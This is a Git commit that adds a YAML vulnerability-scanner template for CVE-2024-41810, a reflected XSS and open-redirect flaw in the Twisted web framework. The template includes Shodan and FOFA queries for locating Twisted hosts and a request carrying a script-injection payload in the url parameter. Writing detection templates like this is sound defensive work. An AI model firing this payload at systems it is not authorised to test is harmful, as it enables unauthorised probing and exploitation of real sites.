Dhiyaneshwaran
GitHub
commit
2ee59dca36
|
|
@ -0,0 +1,59 @@
|
|||
id: CVE-2024-41810
|
||||
|
||||
info:
|
||||
name: Twisted - Open Redirect & XSS
|
||||
author: KoYejune0302,cheoljun99,sim4110,gy741
|
||||
severity: medium
|
||||
description: |
|
||||
Twisted is an event-based framework for internet applications, supporting Python 3.6+. The Twisted web framework's redirectTo function is vulnerable to reflected XSS if an attacker can control the redirect URL. This template tests for an open redirect and XSS vulnerability in the URL parameter. This vulnerability is fixed in 24.7.0rc1.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2024-41810
|
||||
cpe: cpe:2.3:a:twistedmatrix:twisted:*:*:*:*:*:*:*:*
|
||||
reference:
|
||||
- https://github.com/advisories/GHSA-cf56-g6w6-pqq2
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-41810
|
||||
metadata:
|
||||
max-request: 2
|
||||
shodan-query: html:'Twisted' html:"python"
|
||||
fofa-query: body="twisted" && "python"
|
||||
tags: xss,redirect,twisted,python
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
redirects: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: response
|
||||
words:
|
||||
- "TWISTED_SESSION"
|
||||
- '["Twisted'
|
||||
internal: true
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}?url=ws://example.com/"><script>alert(document.domain)</script>'
|
||||
|
||||
redirects: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: response
|
||||
words:
|
||||
- 'Location: ws://example.com/"><script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
Loading…
Reference in New Issue